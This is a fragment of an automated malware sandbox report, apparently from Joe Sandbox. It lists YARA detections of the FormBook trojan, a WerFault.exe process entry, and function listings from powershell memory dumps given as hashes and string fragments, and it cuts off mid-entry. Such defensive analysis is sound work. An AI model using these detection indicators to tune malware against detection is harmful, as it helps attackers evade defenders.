                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Has exited:true

                          General

                          Target ID:25
                          Start time:09:52:55
                          Start date:04/05/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 480
                          Imagebase:0xf80000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Disassembly

                          Reset < >

                            Executed Functions

                            Function 00007FFD9BABCAD6 Relevance: .5, Instructions: 468COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2845662933.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ffd9bab0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b3aad0d4bd05d0c0132c752ce8c5c88b8fdd8193d453c9b18893a9b49e2da2f9
                            • Instruction ID: a031a9a098a6512ebc779aa4499cedfb68305aec600f36f4e7199087c907f334
                            • Opcode Fuzzy Hash: b3aad0d4bd05d0c0132c752ce8c5c88b8fdd8193d453c9b18893a9b49e2da2f9
                            • Instruction Fuzzy Hash: 76F1D730A09A4E8FEBA8DF28C855BE937D1FF55310F04426EE85DC7295DF7899418B81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFD9BABD882 Relevance: .5, Instructions: 454COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2845662933.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ffd9bab0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cd6f347fed1ca027f754de6f0a9bde21bd86a2511b22671b039da2e5772a1d2a
                            • Instruction ID: 5e741b938429bd83adb9ce8c3d27cd3b2078569741f49d50280be7ed5bcd178a
                            • Opcode Fuzzy Hash: cd6f347fed1ca027f754de6f0a9bde21bd86a2511b22671b039da2e5772a1d2a
                            • Instruction Fuzzy Hash: E0E1C530A09A4E8FEBA8DF68C8657E977D1FF54310F04426ED85DC72A5DE7899408B81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFD9BB89CC9 Relevance: .5, Instructions: 476COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2847113762.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ffd9bb80000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d1374edd44e5b0df3a52064d78bd6d5fe339296eaf7d54f678c5a6c32b20b52a
                            • Instruction ID: 70fa86b62144976e5f5dc1946df053f40571a659ff2387522eeceb28f1965683
                            • Opcode Fuzzy Hash: d1374edd44e5b0df3a52064d78bd6d5fe339296eaf7d54f678c5a6c32b20b52a
                            • Instruction Fuzzy Hash: C9E13C32B0FE8E0FEBA5DBA848745A47BD1FF55318F0901BAD59DC71E3CA28A8058741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFD9BB84B64 Relevance: .4, Instructions: 415COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2847113762.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ffd9bb80000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f2392c226cd34c101cdbec706a2fbe076d91455e63bffcd528021e8c977e2bc5
                            • Instruction ID: 8f3a4cac1e98fec04b30e2d2467d6cb324f6ab9084e1fbd5c6e79fa541579b51
                            • Opcode Fuzzy Hash: f2392c226cd34c101cdbec706a2fbe076d91455e63bffcd528021e8c977e2bc5
                            • Instruction Fuzzy Hash: BBC13572B0FE8E0FE7A5EAA848655B97B91FF55318F0901BED45CC70E3E928AD048341
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFD9BB89E67 Relevance: .2, Instructions: 159COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2847113762.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ffd9bb80000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 193b0ddca6e76ca4b9c3e90eb43389b3269a394a3e003e59b9a3a0bb9b54d66f
                            • Instruction ID: 50fb5cd7c4e02b29299de15cff3cb3bac1c911b68f9d70bb6df7a9046ee51630
                            • Opcode Fuzzy Hash: 193b0ddca6e76ca4b9c3e90eb43389b3269a394a3e003e59b9a3a0bb9b54d66f
                            • Instruction Fuzzy Hash: C6511722F1FECE0FEBA997A848745B46AD1FF51258F4A01BAD59CC71E3DD28AC048301
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFD9BAB3945 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2845662933.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ffd9bab0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                            • Instruction ID: b1bce2177bfdf61584f03e64b94d154dfb18d1d555a98c5b8421877d767de26b
                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                            • Instruction Fuzzy Hash: CA01A73020CB0C4FD748EF0CE051AA5B3E0FF85320F10056EE59AC36A1D632E881CB45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 076588A8 Relevance: 26.0, Strings: 20, Instructions: 1036COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (f~l$(f~l$(f~l$(f~l$(f~l$(f~l$(f~l$(f~l$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$x.ok$-ok
                            • API String ID: 0-209773782
                            • Opcode ID: 6fcfa0eb1cbe61b162a414448e4adea09a5637b776bf703e65fe3d99aa5bf58a
                            • Instruction ID: 140179bb37d77511a3c00f25f5696297e064dc31703676dc8856fab6d2e270fd
                            • Opcode Fuzzy Hash: 6fcfa0eb1cbe61b162a414448e4adea09a5637b776bf703e65fe3d99aa5bf58a
                            • Instruction Fuzzy Hash: 0D82C5B0B00315DFDB24CF68C950BAABBB2AF85300F1485A9D9069F755CB31ED86DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07657D80 Relevance: 10.7, Strings: 8, Instructions: 741COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (f~l$(f~l$(f~l$(f~l$(f~l$(f~l$(f~l$(f~l
                            • API String ID: 0-3930440557
                            • Opcode ID: cecba897ebd81f9f4542264833f9ba9a3169d9898cd47cda213d34b32364eadd
                            • Instruction ID: d596232264f5e66c9c29b2c0864a941715f0fc73a5a160d3e864e5aaad82b7b0
                            • Opcode Fuzzy Hash: cecba897ebd81f9f4542264833f9ba9a3169d9898cd47cda213d34b32364eadd
                            • Instruction Fuzzy Hash: FF624AB4A00205DFD714CFA8CA51E9ABBB2BF89314F14C069D906AF755CB72EC46DB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0474D850 Relevance: 10.5, Strings: 8, Instructions: 523COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8N]j$Hbq$h]]j$h]]j$h]]j$$^q$$^q$I]j
                            • API String ID: 0-3281925840
                            • Opcode ID: cca2e12576ffb8cea8489c041aac31767f75cf5ad2478379cb95cff4e1de0450
                            • Instruction ID: 6e8ad77ca65b0eceb5fc4edd8432a41cf1d73bd5c22f92cbe7591d5630f5d9a0
                            • Opcode Fuzzy Hash: cca2e12576ffb8cea8489c041aac31767f75cf5ad2478379cb95cff4e1de0450
                            • Instruction Fuzzy Hash: 4F224E30B002188FDB25EB64C854BAEB7F2BF89315F1584A9D409AB361DF35AD85CF85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0765A318 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$x.ok$-ok
                            • API String ID: 0-3462626453
                            • Opcode ID: 6bccdfeffa4248d07107af31d07ba43e1186ed3ba4d3f499cf768216a3c11f5d
                            • Instruction ID: 0f43656963f0b42ca72bd0a6e49313c1abc4484fad24cc5e93ab77d215261c16
                            • Opcode Fuzzy Hash: 6bccdfeffa4248d07107af31d07ba43e1186ed3ba4d3f499cf768216a3c11f5d
                            • Instruction Fuzzy Hash: 00D1A3B4A402099FDB04DFA8C555B9EBBF2BF88305F10C559D9026F355CB72EC8A8B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07657798 Relevance: 9.2, Strings: 7, Instructions: 439COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (f~l$(f~l$84|l$84|l$tP^q$tP^q$x.ok
                            • API String ID: 0-3413036008
                            • Opcode ID: 7ce5ff56590bf03ba99f23c009e6d4ac7276741f024a553e15b0e10d1d07ab6f
                            • Instruction ID: 9888890752d7b499b40701bf00ec6db6a5b046b1ce01bff79ec24b87225f30f6
                            • Opcode Fuzzy Hash: 7ce5ff56590bf03ba99f23c009e6d4ac7276741f024a553e15b0e10d1d07ab6f
                            • Instruction Fuzzy Hash: 14F1F4B1B002059FD714DF78C954BAEBBE2AF89310F148469D906AF391CB32ED45DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 076592BB Relevance: 9.1, Strings: 7, Instructions: 387COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (f~l$(f~l$4'^q$4'^q$x.ok$x.ok$-ok
                            • API String ID: 0-1840769100
                            • Opcode ID: 544ec7ae8717fea04b53c8c7caca52162892311ec235f887f9feef247d9eec3f
                            • Instruction ID: 490bc5dfe28d1656c13eb40509f74f9a491d74a78145a26894dd4915a7523446
                            • Opcode Fuzzy Hash: 544ec7ae8717fea04b53c8c7caca52162892311ec235f887f9feef247d9eec3f
                            • Instruction Fuzzy Hash: 01F1A1B0A00215DFD724DB28C951F9EBBB3AB84304F1484A9E9096F795CB71ED86CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07650638 Relevance: 7.8, Strings: 6, Instructions: 331COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                            • API String ID: 0-3669853574
                            • Opcode ID: 0c1303705ce5aaddf041b5e94b6f198f34fd13359fff418730b00ddf414710c4
                            • Instruction ID: 5786671b0cfde52508b306fb9dc030daaa2cc27f0f3faecae3a15b4f1834e53f
                            • Opcode Fuzzy Hash: 0c1303705ce5aaddf041b5e94b6f198f34fd13359fff418730b00ddf414710c4
                            • Instruction Fuzzy Hash: 14B159B2B04206DFDB148A79D901A7ABBE6EFC5310F18847ADC068B355DB32DC45D7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0765A2FA Relevance: 6.5, Strings: 5, Instructions: 269COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$4'^q$x.ok$-ok
                            • API String ID: 0-1009051548
                            • Opcode ID: 0ec597493c3704b50f50c05c18e48db7620782eed244f42a4e6153be630ce824
                            • Instruction ID: 2846255a663d98f74d851fa9ee6d4c690d7c2668c5b755cc6d0791aaa9364286
                            • Opcode Fuzzy Hash: 0ec597493c3704b50f50c05c18e48db7620782eed244f42a4e6153be630ce824
                            • Instruction Fuzzy Hash: 88B1AEB4A00205CFDB15CFA8C541B9EBBB2BF88305F14C659E9026F355CB31E88ADB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07655FC0 Relevance: 6.4, Strings: 5, Instructions: 170COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                            • API String ID: 0-3272787073
                            • Opcode ID: c09024ff60d4582f6552d2dc2979e7479d5d6954f8b049eb04c0fcb765029cf0
                            • Instruction ID: 1820a30108b8e2c12e6b8ac689e79b9a8a737475da131d42fd81acfeec908fe3
                            • Opcode Fuzzy Hash: c09024ff60d4582f6552d2dc2979e7479d5d6954f8b049eb04c0fcb765029cf0
                            • Instruction Fuzzy Hash: 02511A707043859FDB268B38C910A6B7FB1AF86710F5480ABD8468F392DB36C845D7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07657D63 Relevance: 4.3, Strings: 3, Instructions: 551COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (f~l$(f~l$(f~l
                            • API String ID: 0-1417331273
                            • Opcode ID: 856dcf66bb12360f8320ed01306131083f15a1d861f165d2e286fe3b54dbead7
                            • Instruction ID: dedc0c1e565e64d65fc0c42048b2a47b6f077c707e728e16a0ff76efcdde84b9
                            • Opcode Fuzzy Hash: 856dcf66bb12360f8320ed01306131083f15a1d861f165d2e286fe3b54dbead7
                            • Instruction Fuzzy Hash: F9323AB4A00205DFD710CFA8C951E99BBB2BF89314F15C059E90AAF755CB72EC46DB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 076584F5 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (f~l$(f~l$(f~l
                            • API String ID: 0-1417331273
                            • Opcode ID: 0b41d0fa0148070e33ad3a80195ed55ffb630491d493999f103af836a292e82b
                            • Instruction ID: 0a4ed1db7c0ff6788072dc914fe62735b5bef2e7bf8b511157d143f83ddc7729
                            • Opcode Fuzzy Hash: 0b41d0fa0148070e33ad3a80195ed55ffb630491d493999f103af836a292e82b
                            • Instruction Fuzzy Hash: EB123BB4A00206DFDB10CFA8C951E9ABBB2BF85315F14C059E906AF755CB72EC46DB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07656364 Relevance: 2.6, Strings: 2, Instructions: 108COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 84|l$tP^q
                            • API String ID: 0-2567176018
                            • Opcode ID: 1dabd8f5a4b7adc37bf3d6276d61347b1ba782910e34cd28ae2e5286dc2b3fc1
                            • Instruction ID: fba01ff6e81ec82273f1de12946f921550bbd20d71cd2d832bd0a448953c3763
                            • Opcode Fuzzy Hash: 1dabd8f5a4b7adc37bf3d6276d61347b1ba782910e34cd28ae2e5286dc2b3fc1
                            • Instruction Fuzzy Hash: 16411670A052959FCB158B34C804A5ABFB1AF46714F59C09BD845CF3A2C735DC4AC7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0474E508 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: h]]j$I]j
                            • API String ID: 0-1931112817
                            • Opcode ID: e77ef3ab5022b8732dc8143c9f315fa87f0c771d90a5d095d3c9f11a90d62c01
                            • Instruction ID: 98c15010af78fb9ce2739f8dce138fb5e25141ae4b9a80822296ed4cc1be4375
                            • Opcode Fuzzy Hash: e77ef3ab5022b8732dc8143c9f315fa87f0c771d90a5d095d3c9f11a90d62c01
                            • Instruction Fuzzy Hash: 8D310730B011288FCB25EB68C8546EEB7B2BF89319F1144E9D509AB351DF35AE85CF85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07650625 Relevance: 2.6, Strings: 2, Instructions: 61COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: $^q$$^q
                            • API String ID: 0-355816377
                            • Opcode ID: 06b8966e33fbddab4ca4a31f9c8745604d7f3bb67ea9ca00e58effd2e6adb50a
                            • Instruction ID: cafd49d6af126552df106ca873f97f32bbad82d0ae6d81b91dc04daed0db1ce6
                            • Opcode Fuzzy Hash: 06b8966e33fbddab4ca4a31f9c8745604d7f3bb67ea9ca00e58effd2e6adb50a
                            • Instruction Fuzzy Hash: 0411C6B6708246DFD7158E34D940D62BBB5AFC2314F19825BEC06AF352DB32D801D762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0765A73E Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: x.ok
                            • API String ID: 0-2233070397
                            • Opcode ID: a361f47ed19ce28caf84f390af56ec4b75be252616055da725824990da14e68b
                            • Instruction ID: 6348a77df14eca293dbc0901551464ca6c3bd718cd91ce74d0fc1e05a0c3408d
                            • Opcode Fuzzy Hash: a361f47ed19ce28caf84f390af56ec4b75be252616055da725824990da14e68b
                            • Instruction Fuzzy Hash: 0331B3B4B41204AFE7059BB4C911FAE7BA3EB85305F10C429E9017F791CE76AD468B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0474C048 Relevance: .3, Instructions: 346COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2943f7cb3689a6609fa7ef0d9e2f03dafc6537daa4e0332dc26d89f7a12d7f95
                            • Instruction ID: 186c33984926f2ff511cd295501bc5da17ee3b289af15bc1213b679b4bc3d950
                            • Opcode Fuzzy Hash: 2943f7cb3689a6609fa7ef0d9e2f03dafc6537daa4e0332dc26d89f7a12d7f95
                            • Instruction Fuzzy Hash: CEE1F574A01209EFDB15CFA8C584AADBBF2FF89310F258559E805AB365C731ED85CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0474ADA8 Relevance: .3, Instructions: 317COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 474dbe8f9a2207d54a388a684740aa8b256f101ff6e6c3a9c0134952b303e78a
                            • Instruction ID: fdfcbc30251b06b04c12a823ef97ae088b55dee3c4587d1531a4fcee8130f02c
                            • Opcode Fuzzy Hash: 474dbe8f9a2207d54a388a684740aa8b256f101ff6e6c3a9c0134952b303e78a
                            • Instruction Fuzzy Hash: F3C19831A002089FCB14DFA5D584AADBBB6FFC9315F118569E406AB365DB34FD89CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04743670 Relevance: .3, Instructions: 316COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e41dd5f03489808387246f23b653113ceb5a550531c38ffb75b70fd10c48bc72
                            • Instruction ID: 89d70787a1c3fc8c26d2c8bb490decd600ca102066382ce8dca3a8bb0f4cd176
                            • Opcode Fuzzy Hash: e41dd5f03489808387246f23b653113ceb5a550531c38ffb75b70fd10c48bc72
                            • Instruction Fuzzy Hash: FDD12874A01209DFDB05CFA8D584AADFBB2FF88314F258159E808AB365C735ED85CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0474AAE0 Relevance: .2, Instructions: 226COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a8cd752ebc94d962a2d266ed9cf160d9779caeee43953cafb00e586dfca5f7af
                            • Instruction ID: a2d5155ee652ff3ac0a5a037a8c158cedcc50669dbc3a95dc5952c93c6c5830c
                            • Opcode Fuzzy Hash: a8cd752ebc94d962a2d266ed9cf160d9779caeee43953cafb00e586dfca5f7af
                            • Instruction Fuzzy Hash: 1F91BD34A012449FCB14DFA9D884AAEBBF2FF89314F1585A9E4059B361DB35EC86CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04742B48 Relevance: .2, Instructions: 223COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 434c35281d974e119ca21a2825d23603063dbf49586bccee67ff9ee1d7b7867d
                            • Instruction ID: 1e95ad06e43738fcd6cdbb98144efe613e1c35597726fb4be7602b380edc53c9
                            • Opcode Fuzzy Hash: 434c35281d974e119ca21a2825d23603063dbf49586bccee67ff9ee1d7b7867d
                            • Instruction Fuzzy Hash: A891AB74A006458FCB05CF99C4949BAFBB1FF88310B248599E455AB3A6C735FC50CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04748DBE Relevance: .2, Instructions: 188COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 846faca4878dbb0ca2051a7b1d94d06a0571ec55100ad6e919a45d5657cd0304
                            • Instruction ID: 2de865910488931df3426a017fee974db74b661313a94afb6fac656a43fbf9a0
                            • Opcode Fuzzy Hash: 846faca4878dbb0ca2051a7b1d94d06a0571ec55100ad6e919a45d5657cd0304
                            • Instruction Fuzzy Hash: F6712834E00208DFDB14EFA5D484BADBBF2BF88304F158529D416AB760DB75AD8ACB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 047487BA Relevance: .2, Instructions: 172COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a8f6ceab978b3a5a2df41d56b413d51070d5805e76268db61608bf85196ae5a6
                            • Instruction ID: 1f8dd16f276ce1cf29b4f172331fd9d3bc6d8d2867b0440cc4162d75a55b9de2
                            • Opcode Fuzzy Hash: a8f6ceab978b3a5a2df41d56b413d51070d5805e76268db61608bf85196ae5a6
                            • Instruction Fuzzy Hash: 47612E34A002498FCB15DFA4D584AADBBB2FF85340F158555E402AF369DB78ED89CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 047487C8 Relevance: .2, Instructions: 161COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5bdbec6f692f31e694196fc16122230e5524c2e45f8e0aed9278da5545207134
                            • Instruction ID: 313e70c1e6199b0fe3f8e4fbbbd48bc534370d5ac7023660d273fe760cc4481b
                            • Opcode Fuzzy Hash: 5bdbec6f692f31e694196fc16122230e5524c2e45f8e0aed9278da5545207134
                            • Instruction Fuzzy Hash: B6610C34A00649DFDB15DFA4C584AADBBB2FF85300F158554E402AF369DB78ED89CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04748C93 Relevance: .2, Instructions: 152COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c80dd0282c1aef2945e200ad37cf9b9aea55c6f31acba2b6357cac0208560c3c
